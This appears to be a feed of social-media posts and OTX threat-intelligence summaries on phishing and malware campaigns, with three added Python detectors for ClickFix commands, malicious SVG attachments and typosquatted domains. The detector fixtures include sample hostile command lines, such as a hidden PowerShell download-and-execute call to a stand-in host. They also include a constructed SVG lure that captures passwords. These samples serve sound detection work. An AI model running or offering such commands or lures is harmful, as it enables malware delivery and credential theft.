Ok, that's new even to me... #Phishing aimed at a self-hosted #Email #Server. #Roundcube #Yunohost #OpenSource
Last week I posted a thread about a #spam campaign delivering a #ConnectWise client as its payload. As of this morning, the threat actors have changed the payload (https://www.virustotal.com/gui/file/30e1d059262b851a2b432ec856aeba5bb639ba764aa85643703163d62000a2f4) and it appears to try to connect to the address "relay.noscreener[.]info" which resolves to 104.194.145.66.
Embedded in the installer .msi file is a file called system.config, which contains this domain name and a base64-encoded string.
The fake Social Security website is still being hosted on a compromised site that belongs to a temp agency based on the east coast of the US.
Previous thread:
#Phishing: Alleged refund in the name of the #AOK: https://verbraucherzentrale.nrw/phishing
Detailed Analysis of DocSwap Malware Disguised as Security Document Viewer
A new malware called DocSwap, disguised as a document viewing authentication app, was discovered targeting South Korean mobile users. The malware, linked to a North Korean APT group, performs keylogging and information theft through accessibility services. It decrypts an obfuscated APK file, executes code from a DEX file, and communicates with a C2 server to receive malicious commands. The malware requests extensive permissions, maintains persistence, and performs various malicious activities including camera manipulation and audio recording. The C2 infrastructure initially displayed a phishing page impersonating CoinSwap, later showing characteristics associated with the Kimsuky group. The threat actor has been designated as puNK-004 by S2W TALON.
Pulse ID: 67faa88ecf8cad21f1b6a246
Pulse Link: https://otx.alienvault.com/pulse/67faa88ecf8cad21f1b6a246
Pulse Author: AlienVault
Created: 2025-04-12 17:53:18
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
A Deep Dive into Strela Stealer and how it Targets European Countries
Strela Stealer, an infostealer targeting email clients in specific European countries, has been active since late 2022. It focuses on exfiltrating credentials from Mozilla Thunderbird and Microsoft Outlook. The malware is delivered through phishing campaigns, primarily targeting Spain, Italy, Germany, and Ukraine. Recent attacks involve forwarding legitimate emails with malicious attachments. Strela Stealer employs multi-layer obfuscation and code-flow flattening to complicate analysis. The malware verifies the system's locale before executing, targeting specific German-speaking countries. It searches for email client profile data, encrypts it, and exfiltrates it to a command-and-control server. The infrastructure is linked to Russian bulletproof hosting providers, suggesting potential ties to Russian threat actors.
Pulse ID: 67fb93e88bf6ed070ce7164a
Pulse Link: https://otx.alienvault.com/pulse/67fb93e88bf6ed070ce7164a
Pulse Author: AlienVault
Created: 2025-04-13 10:37:28
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware
A phishing campaign targeting organizations in the hospitality industry has been identified, impersonating Booking.com and using the ClickFix social engineering technique to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, targets individuals likely to work with Booking.com in North America, Oceania, Asia, and Europe. The attack uses fake emails and webpages to trick users into executing malicious commands, leading to the download of various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. The campaign aims to steal financial data and credentials for fraudulent use, showing an evolution in the threat actor's tactics to bypass conventional security measures.
Pulse ID: 67fb93e8ebc93d6ded395f39
Pulse Link: https://otx.alienvault.com/pulse/67fb93e8ebc93d6ded395f39
Pulse Author: AlienVault
Created: 2025-04-13 10:37:28
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
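The pulse above describes ClickFix: the lure gets the victim to paste a command into the Run dialog themselves, so the malicious process is a child of explorer.exe rather than of an Office or installer process. The following is an added example, not code from the Microsoft write-up or from the pulse, showing how that parent/child relationship plus a few command-line traits can be scored in process-creation telemetry. The records are constructed to resemble Sysmon Event ID 1 fields; the field names, the indicator patterns and the score threshold are assumptions for illustration, not a vendor schema or a published rule.

```python
"""Flag ClickFix-style command execution in process-creation telemetry.

Added example; not code from the Microsoft write-up or the OTX pulse. The
records below are constructed to resemble Sysmon Event ID 1 fields; the
field names, the indicator patterns and the score threshold are assumptions
for illustration, not a vendor schema or a published rule.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# ClickFix lures have the victim paste a command into the Run dialog or the
# Explorer address bar, so the process parent is explorer.exe, not a script
# host or installer. A hand-opened cmd/powershell would also show here.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Living-off-the-land binaries the pasted one-liners typically start.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "curl.exe", "certutil.exe", "msiexec.exe"}

# Command-line traits; each hit adds one point. Patterns are deliberately
# loose (they match "-w hidden", "-WindowStyle Hidden", "-enc <b64>", ...).
SUSPICIOUS = [
    (re.compile(r"-w\S*\s+h(idden)?\b", re.I), "hidden window"),
    (re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
     "download cradle"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "inline execution"),
    (re.compile(r"\.(hta|ps1|vbs|js|bat)\b", re.I), "script payload"),
]
THRESHOLD = 2  # assumed; tune against your own baseline


@dataclass
class Finding:
    record_id: int
    image: str
    score: int
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Finding]:
    """Finding for an interactive LOLBin launch with suspicious traits, else None."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    if image not in LOLBINS or parent not in INTERACTIVE_PARENTS:
        return None
    reasons = [label for rx, label in SUSPICIOUS if rx.search(ev["CommandLine"])]
    if not reasons:
        return None
    return Finding(ev["RecordId"], image, len(reasons), reasons)


def scan(events) -> list:
    """Findings at or above THRESHOLD, in log order."""
    out = []
    for ev in events:
        f = score_event(ev)
        if f and f.score >= THRESHOLD:
            out.append(f)
    return out


# Constructed records, not real telemetry; hostnames use the reserved .example TLD.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://captcha-verify.example/run.ps1 | iex"'},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://captcha-verify.example/verify.hta"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -File C:\ProgramData\agent\inventory.ps1"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"RecordId": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.image} score={f.score} {f.reasons}")
```

Record 3 carries the same hidden-window flag as record 1 but is launched by services.exe, so it is dropped before scoring: the parent check is what separates a pasted lure from a scheduled management script. Record 4 shows that an interactive cmd.exe on its own is not a finding.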
I'm as sure as I can be that I've had a phishing attempt from two hotels that I've booked for my Slovakia trip in September.
Both hotels are in the same group. Identical emails but also identical messages within the booking.com messaging system.
They want me to reconfirm my credit card details - hmmmm!
I've emailed the hotels directly and also messaged booking.com
Maybe this is yet another argument for booking direct with the hotels rather than using a booking agent.
Massive Surge in SVG Based Phishing
A new breed of phishing attacks is targeting web users using SVG image files as the delivery vehicle, according to a new report from Trustwave SpiderLabs.
Pulse ID: 67fbb96ccb2b2cd5801ad78b
Pulse Link: https://otx.alienvault.com/pulse/67fbb96ccb2b2cd5801ad78b
Pulse Author: cryptocti
Created: 2025-04-13 13:17:32
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
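SVG is XML, so an "image" attachment can carry a script element, event-handler attributes, outbound links and even embedded HTML forms, which is what makes it usable as a phishing vehicle. The following is an added example, not code from the Trustwave SpiderLabs report or from the pulse, that walks an SVG document and reports those active-content indicators. Both SVG documents are constructed here, and the indicator list is an assumption about how SVG lures generally work rather than a list taken from the report.

```python
"""Flag active content in an SVG email attachment.

Added example; not code from the Trustwave SpiderLabs report or the OTX
pulse. The two SVG documents below are constructed, and the indicator list
is an assumption about how SVG lures generally work (script, event handlers,
outbound links, embedded HTML), not a list taken from the report.
"""
import re
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script": "script element", "foreignobject": "foreignObject (embeds HTML)"}
# Helpers a lure script uses to unpack an obfuscated redirect target.
DECODE_RX = re.compile(r"\b(atob|unescape|decodeuricomponent|fromcharcode)\s*\(", re.I)


def _local(name: str) -> str:
    # ElementTree names are "{namespace}local"; compare on the local part only.
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list:
    """Return a list of human-readable indicators; empty means nothing active found."""
    # Entity declarations have no place in an attachment; refusing them also
    # sidesteps entity-expansion attacks on the stdlib parser. For production
    # use defusedxml.ElementTree rather than this byte check.
    if b"<!ENTITY" in data.upper():
        return ["DTD entity declaration"]
    findings = []
    for el in ET.fromstring(data).iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(ACTIVE_TAGS[tag])
        if tag == "script" and el.text and DECODE_RX.search(el.text):
            findings.append("script decodes an obfuscated payload")
        if tag == "form":
            findings.append("HTML form (credential capture)")
        for attr, val in el.attrib.items():
            name = _local(attr)
            low = val.strip().lower()
            if name.startswith("on"):
                findings.append(f"event handler {name}")
            elif name in ("href", "action") and low.startswith("javascript:"):
                findings.append("javascript: URL")
            elif name in ("href", "action") and low.startswith("data:text/html"):
                findings.append("data: URL carrying HTML")
            elif name in ("href", "action") and low.startswith(("http://", "https://")) and tag in ("a", "form"):
                findings.append(f"outbound {tag} to {val}")
    return findings


def is_active_svg(data: bytes) -> bool:
    return bool(scan_svg(data))


# Constructed samples. A base64 raster inside <image> is normal and must not trip the scanner.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24">'
              b'<image href="data:image/png;base64,iVBORw0KGgo=" width="24" height="24"/>'
              b'<rect width="24" height="24" fill="none" stroke="black"/></svg>')

# The base64 blob is constructed filler; the scanner only cares that atob() is called.
LURE_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script><![CDATA[
    function init(){ window.location = atob("aHR0cHM6Ly9sb2dpbi5leGFtcGxlLw=="); }
  ]]></script>
  <a xlink:href="https://login.example/verify"><text x="4" y="16">Open secure document</text></a>
  <foreignObject width="200" height="80">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://login.example/post"><input name="password"/></form>
  </foreignObject>
</svg>'''

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, scan_svg(doc))
```

Rendering context matters for the outcome: a mail client that shows the attachment inline as an image will not run the script, but a browser opening the file directly will, so the gateway decision should be based on content, not on the declared image/svg+xml type.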
So I genuinely wondered for a moment whether it could really be that I'm supposed to pay 1.95 euros so that emails keep being delivered to me... and was already about to get upset that as a paying customer you now have to pay extra on top and all that.
But this spam mail is well made, I'll give it that...
How do you get #Hetzner to shut down the #Phishing mail domains and websites? The answers I get from abuse@ aren't particularly promising - they would like to forward my reports to the customer, which of course is out of the question, since the customer is the criminal himself. Is there a Bavarian internet police station that takes reports on this topic, and not only on online auction fraud and crimes involving bicycles or motor vehicles?
https://www.europesays.com/1987931/ The Critical Need for Cybersecurity #AntiPhishingTraining #cryptolocker #europe #Florida #hackers #Hacking #KevinMitnick #knowbe4 #OnLineTraining #PhishProne #phishing #ransomware #SecurityAwarenessTraining #SocialEngineering #SpearPhishing #StuSjouwerman #TampaBay #training
When you're out shopping for phishing domains again and then don't want to spend the 18 € after all, because you only collect the ones belonging to #Hochwertziel-Orgs (high-value-target orgs). #fdp #phishing
A technical overview of phishing infrastructure and considerations for Red Teaming
Unraveling the U.S. toll road smishing scams
A widespread financial theft SMS phishing campaign targeting toll road users across multiple U.S. states has been observed since October 2024. The attacks impersonate automatic payment services like E-ZPass, claiming outstanding bills under $5 USD and warning of late fees. Victims are directed to spoofed domains where they are prompted to enter personal and credit card information. The campaign is believed to be carried out by multiple financially motivated threat actors using a smishing kit developed by 'Wang Duo Yu'. The kit's developer offers tutorials and services through Telegram channels and a YouTube channel. The ongoing campaign has targeted at least eight states, including Washington, Florida, Pennsylvania, and Texas, using typosquatted domains resolving to specific IP addresses.
Pulse ID: 67f88c2dc5d8b3383f8d9c72
Pulse Link: https://otx.alienvault.com/pulse/67f88c2dc5d8b3383f8d9c72
Pulse Author: AlienVault
Created: 2025-04-11 03:27:41
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
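The toll-road campaign above relies on typosquatted domains that embed or misspell the operator's brand next to words like "toll" or "bill". The following is an added example, not code from the Cisco Talos report or from the pulse, scoring domains against a single brand string the way a lightweight triage script would. E-ZPass is the brand the pulse names; the lure-word list, the homoglyph table, the allowlist entry and the sample domains (all on the reserved .example TLD) are constructed assumptions for illustration.

```python
"""Score SMS-delivered domains for toll-operator typosquatting.

Added example; not from the Cisco Talos report or the OTX pulse. E-ZPass is
the brand the pulse names; the lure words, homoglyph map, allowlist and
sample domains below are constructed assumptions for illustration.
"""
import re

BRAND = "ezpass"  # E-ZPass, lower-cased with the hyphen removed
LURE_WORDS = {"toll", "tolls", "pay", "payment", "bill", "fee", "fees", "invoice", "notice"}
ALLOWLIST = {"ezpass.com"}  # placeholder; put the operator's real domains here
# Digits attackers substitute for look-alike letters.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "8": "b"})


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance, two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str):
    """(second-level label, full normalised domain); accepts defanged 'a[.]b'."""
    d = domain.lower().strip().replace("[.]", ".").rstrip(".")
    labels = d.split(".")
    return (labels[-2] if len(labels) >= 2 else labels[0]), d


def score_domain(domain: str):
    """Return (score, reasons). Score 0 means no brand-related signal."""
    label, full = registrable_label(domain)
    if full in ALLOWLIST:
        return 0, ["allowlisted"]
    reasons = []
    tokens = [t for t in re.split(r"[-_]", label) if t]
    joined = "".join(tokens)
    # "ezpass-toll-pay": the exact brand padded with extra words.
    if BRAND in joined and joined != BRAND:
        reasons.append("brand embedded with extra tokens")
    for t in tokens:
        deglyphed = t.translate(HOMOGLYPHS)
        # "ezpa55": reads as the brand once digits become letters.
        if deglyphed == BRAND and t != BRAND:
            reasons.append("digit homoglyph")
            continue
        d = levenshtein(deglyphed, BRAND)
        # One edit away, or two edits for a token at least as long as the brand,
        # so that short generic words such as "pass" do not match.
        if t != BRAND and (d == 1 or (d == 2 and len(t) >= len(BRAND))):
            reasons.append(f"close misspelling '{t}'")
        if t in LURE_WORDS:
            reasons.append(f"lure keyword '{t}'")
    return len(reasons), reasons


# Constructed sample input, not domains from the campaign.
SAMPLE_DOMAINS = [
    "ezpass-toll-pay.example",
    "ezpas-bill.example",
    "ezpa55.example",
    "weather-news.example",
    "ezpass.com",
]

if __name__ == "__main__":
    for dom in SAMPLE_DOMAINS:
        print(dom, *score_domain(dom))
```

A lure keyword on its own is a weak signal (plenty of legitimate domains contain "pay"), so in practice the threshold for action sits at a score of two or at any brand-derived reason; the allowlist exists because the operator's own domains will otherwise look like near-misses of their own brand.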
Current #Phishing: Supposedly required verification of your phone number at the neobank #N26: https://www.verbraucherzentrale.nrw/phishing
Reminds me to not check email.
How to identify a #phishing attack
https://bitwarden.com/blog/what-is-a-common-indicator-of-phishing/
#Phishing kits now vet victims in real-time before stealing credentials